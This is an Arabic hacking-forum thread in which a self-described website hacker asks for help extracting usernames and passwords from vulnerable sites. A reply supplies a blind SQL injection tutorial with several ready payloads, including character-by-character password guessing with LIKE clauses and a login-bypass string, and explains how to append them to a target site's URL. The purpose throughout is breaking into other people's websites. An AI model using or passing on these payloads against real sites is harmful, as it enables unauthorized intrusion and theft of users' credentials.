[ سؤال ] ضاق صدري

الموضوع في 'مشاكل / حلول' بواسطة jne, بتاريخ ‏11 ابريل 2014.

الوسوم:
حالة الموضوع:
مغلق
  1. jne

    jne Developer

    الأنتساب:
    ‏11 ابريل 2014
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    [SIبسم الله الرحمن الرحيم

    اخباركم شباب انا محترف اختراق مواقع ولكني تركت فتره 6 اشهر

    وحاليا رجعت احاول الحقن فلا استطيع

    واحاول التخمين فلا استطيع يعني انا عندي الادوات واحضر المواقع المصابه لكن لا يضهر اليوزر والباسورد

    راح اتجنن اتمنه المساعده باأي طريقه او اي شيئ او اي موقع مصاب للاستعاده فقط#ٌnًo.
    ZE="5"][/SIZE]​
     
  2. Mr.FriezA

    Mr.FriezA V • I • P

    الأنتساب:
    ‏10 مارس 2014
    المشاركات:
    552
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    18
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    رد: ضاق صدري

    حاول اعاده تثبيت البرامج ؟؟؟
     
  3. jne

    jne Developer

    الأنتساب:
    ‏11 ابريل 2014
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ضاق صدري

    اخي فعلتها ولم يفيد هل تمتلك سكايبي للتكلم والمساعده اي شي)5:"

    ودي
     
  4. Mr.FriezA

    Mr.FriezA V • I • P

    الأنتساب:
    ‏10 مارس 2014
    المشاركات:
    552
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    18
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    رد: ضاق صدري

    اخي ياليت صوره للتوضيح
     
  5. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    رد: ضاق صدري

    اخي عند ايجاد صفحة او موقع مصاب بحقن السكيول او تشك بأنه مصاب بالسكيول . جرب تخمين الباسورد بأستخدام الاكواد التالية , وطبعا قد تطيل هذه العملية ساعات او دقائق حسب الامكانية , اتبع التالي :

    1- ان كان الباسورد (يحتوي) على حرف A , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%ِ%') AND ''='
    2- ان كان الباسورد (يبدأ) بحرف A , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'A%') AND ''='
    
    3- ان كان الباسورد ( يحتوي ) على حرف A (ويتبعه) حرف S , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%A%S%') AND ''='
    
    4- ان كان الباسورد ( يحتوي) على حرف A ( بالمرتبة الرابعة بين الاحرف ) , فيكون الحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
    

    5- ان كنت لا تعرف اليوزر ولا الباسورد , ايضا استخدم هذا الحقن :-


    كود:
    'SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''

    ملاحظة : طريقة الحقن :-


    http://www.xxxx.com/page.php
    حيث xxxx هو رابط الموقع المستهدف
    و page.php هي الصفحة المصابة بحقن السكيول او التي يمكن ان تكون مصابة .


    لاستخدام اي حقنة ضع العلامة ' ثم كود الحقنة بعد رابط الصفحة , مثــال :


    كود HTML:
    http://www.xxxx.com/page.php' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
    
    حيث تم وضع العلامة ' ثم كود الحقنة مباشـــــرتـــا , وهكذا على باقي حقن السكيول SQL.




     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة